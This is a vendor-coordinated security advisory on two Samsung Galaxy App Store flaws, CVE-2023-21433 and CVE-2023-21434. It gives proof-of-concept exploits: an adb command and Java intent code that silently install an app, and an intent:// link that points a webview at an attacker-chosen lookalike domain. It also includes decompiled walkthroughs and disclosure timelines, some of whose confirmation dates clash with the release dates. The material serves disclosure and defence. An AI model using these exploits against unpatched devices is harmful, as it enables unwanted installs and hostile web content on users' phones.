Technical Advisory – Multiple Vulnerabilities in the Galaxy App Store (CVE-2023-21433, CVE-2023-21434)

The Galaxy App Store is an alternative application store that comes pre-installed on Samsung Android devices. Several Android applications are available on both the Galaxy App Store and Google App Store, and users have the option to use either store to install specific applications.

Two vulnerabilities were uncovered with the Galaxy App Store application:

  • Technical Advisory: Improper access control could allow local attackers to install applications from the Galaxy App Store (CVE-2023-21433)
  • Technical Advisory: Improper input validation could allow local attackers to execute JavaScript by launching a web page (CVE-2023-21434)

Technical Advisories

Improper access control could allow local attackers to install applications from the Galaxy App Store (CVE-2023-21433)

Vendor: Samsung
Vendor URL: https://www.samsung.com
Versions Affected: 4.5.44.1, other versions might be affected
Systems Affected: Galaxy App Store Android Application (com.sec.android.app.samsungapps)
CVE Identifier: CVE-2023-21433

Summary

It was found that the Galaxy App Store has an exported activity which does not handle incoming intents in a safe manner. This allows other applications installed on the same Samsung device to automatically install any application available on the Galaxy App Store without the user’s knowledge.

It should be noted that due to the changes made to Android 13, this issue only affects Samsung devices that are running Android 12 and below.

Impact

A pre-installed rouge application on a Samsung device running Android 12 or below can abuse this issue to install any application currently available on the Galaxy App Store.

Proof of Concept (PoC)

The following adb command can be used to abuse this issue to automatically install the application “Pokemon Go”:

am start -n com.sec.android.app.samsungapps/.detail.alleypopup.AlleyDetailActivity --es GUID com.nianticlabs.pokemongo.ares --ez directInstall true --ez directOpen true

Alternatively, the following Java code can be used to perform the same action:

Intent intent = new Intent();
intent.setComponent(new ComponentName("com.sec.android.app.samsungapps", "com.sec.android.app.samsungapps.detail.alleypopup.AlleyDetailActivity"));
intent.putExtra("GUID", "com.nianticlabs.pokemongo.ares");
intent.putExtra("directInstall", true);
intent.putExtra("directOpen", true);
startActivity(intent);

Technical Walkthrough

After executing the PoC, the activity com.sec.android.app.samsungapps.detail.alleypopup.AlleyDetailActivity method onCreate(bundle) processes the incoming intent. As a part of this function, one of two methods will be executed depending on if the incoming intent contained a data property:

public class AlleyDetailActivity {
...
public void onCreate(Bundle bundle) {
    ...
    Intent intent = getIntent();
    Uri data = intent.getData();
    ...
    if (data == null) {
        a(intent);
    } else {
        e();
    }
    ...
}

The PoC did not add a data property to the new intent, so the method a(intent) gets executed, while passing the calling intent as an argument. Within a(intent), the intent and its extras are passed to class com.sec.android.app.samsungapps.detail.alleypopup.AlleyBundleContainer method parseValues(bundle, intent):

public class AlleyDetailActivity {
...
public void a(Intent intent) {
    ...
    Bundle extras = intent.getExtras();
    AlleyBundleContainer bundleContainer = getBundleContainer();
    ...
    if (extras != null) {
        this.f = bundleContainer.parseValues(extras, intent);
    }
    ...
}

The method parseValues(bundle, intent) parses the intent extras and adds them to a Content object. Some of the important values include:

  • “GUID” = the package name of the application to be installed
  • “directInstall” = if the package should be automatically installed
  • “directOpen” = if the application should be opened right after it is installed
public class AlleyBundleContainer {
...
public ContentDetailContainer parseValues(Bundle bundle, Intent intent) {
    Content content = new Content();
    String string = bundle.getString(“GUID”);
    content.setGUID(string);
    ...
    this.g = bundle.getBoolean(“directInstall”, false)
    this.h = bundle.getBoolean(“directOpen”, false)
    ...
    return content;
}

Later, since directInstall is set to true, the application will execute the method J() within the AlleyDetailActivity class. This method will then execute the method b(AlleyDetailActivity) within the class com.sec.android.app.samsungapps.detail.alleypopup.b:

public class AlleyDetailActivity {
...
public void J() {
    ...
    if (this.d == Constant_todo.AppType.APP_NOT_INSTALLED || this.d == Constant_todo.AppType.APP_UPDATABLE) {
        b.b(this);
    }
}

The method b(AlleyDetailActivity) will then setup a task to download and install the target application which was previously specified by the incoming intent. After the application is installed, since “directOpen” was set to “True”, the Galaxy App Store application will open the newly installed application.

Recommendation

For Samsung devices running Android 12 or lower, Samsung has released an updated version of the Galaxy App Store (version 4.5.49.8). Users should open the Galaxy App Store on their phone, and if prompted, download and install the latest version.

This issue does not affect devices running Android 13. Users should still update their Galaxy App Store to the latest version to address potentially other issues.

Disclosure Timeline

November 23, 2022: Samsung notified of vulnerability

November 23, 2022: Samsung acknowledged receipt of report and a security analyst was assigned to analyze the report

December 11, 2023: Samsung confirmed the vulnerability and rated it as a High risk

January 1, 2023: Samsung has released Galaxy App Store version 4.5.49.8 and has publicly disclosed the issue

Improper input validation could allow local attackers to execute JavaScript by launching a web page (CVE-2023-21434)

Vendor: Samsung
Vendor URL: https://www.samsung.com
Versions Affected: 4.5.48.3, other versions might be affected
Systems Affected: Galaxy App Store Android Application (com.sec.android.app.samsungapps)
CVE Identifier: CVE-2023-21434

Summary

It was found that a webview within the Galaxy App Store contained a filter which limited which domains that webview could browse to. However, the filter was not properly configured, which would allow the webview to browse to an attacker controlled domain.

Impact

Either tapping a malicious hyperlink in Google Chrome or a pre-installed rogue application on a Samsung device can bypass Samsung’s URL filter and launch a webview to an attacker controlled domain.

Proof of Concept (PoC)

While using the Chrome web browser on a Samsung device, the following hyperlink can be tapped to exploit this issue:

<h1>
  <a id="yayidyay" rel="noreferrer" href="intent://cloudgame/monitor?monitoringHost=<host>#Intent;action=android.intent.action.VIEW;package=com.sec.android.app.samsungapps;scheme=normalbetasamsungapps;S.android%2eintent%2eextra%2eREFERRER_NAME=http://com.sec.android.app.samsungapps;end">
YAYPOCYAY</a>
</h1>

In the above PoC, “<host>” needs to be replaced with an attacker controlled domain, and a malicious website must be hosted on the domain over HTTPS. The domain name must have “player.glb.samsung-gamelauncher.com” in it. For example, the domain “player.glb.samsung-gamelauncher.com.nccgroup.com” would be a valid domain.

Technical Walkthrough

After launching the above PoC, the class com.sec.android.app.samsungapps.deeplink.CloudGameDeepLink is loaded, and the method e(context) is executed. This method determines if the Cloud Game deeplink should be executed, and the requirements to return “True” are:

  • The “sender” of the intent must be “com.sec.android.app.samsungapps”
    • This can be achieved by adding the string intent extra android.intent.extra.REFERRER_NAME in a browsable intent, and launched from the Google Chrome browser
    • Using the Samsung Browser will not meet this requirement due to how the browser handles browsable intents
  • The “monitoringHost” parameter must contain the string “player.glb.samsung-gamelauncher.com”
private boolean e(Context context) {
    if (context.getPackageName().equals(getSender())) {
        return this.L.getMonitoringHost().contains("player.glb.samsung-gamelauncher.com");
    }
    Loger.w(String.format("[%s] Unauthorized access from %s", M, getSender()));
    return false;
    }

An attacker can register an arbitrary domain and add “player.glb.samsung-gamelauncher.com” as a subdomain. For example, the domain “player.glb.samsung-gamelauncher.com.nccgroup.com” would force the method “e(context)” to return “True”

Recommendation

Samsung has released an updated version of the Galaxy App Store (version 4.5.49.8). Users should open the Galaxy App Store on their phone, and if prompted, download and install the latest version.

Disclosure Timeline

December 3, 2022: Samsung notified of vulnerability

December 3, 2022: Samsung acknowledged receipt of report and a security analyst was assigned to analyze the report

December 18, 2023: Samsung confirmed the vulnerability and rated it as a Moderate risk

January 1, 2023: Samsung has released Galaxy App Store version 4.5.49.8 and has publicly disclosed the issue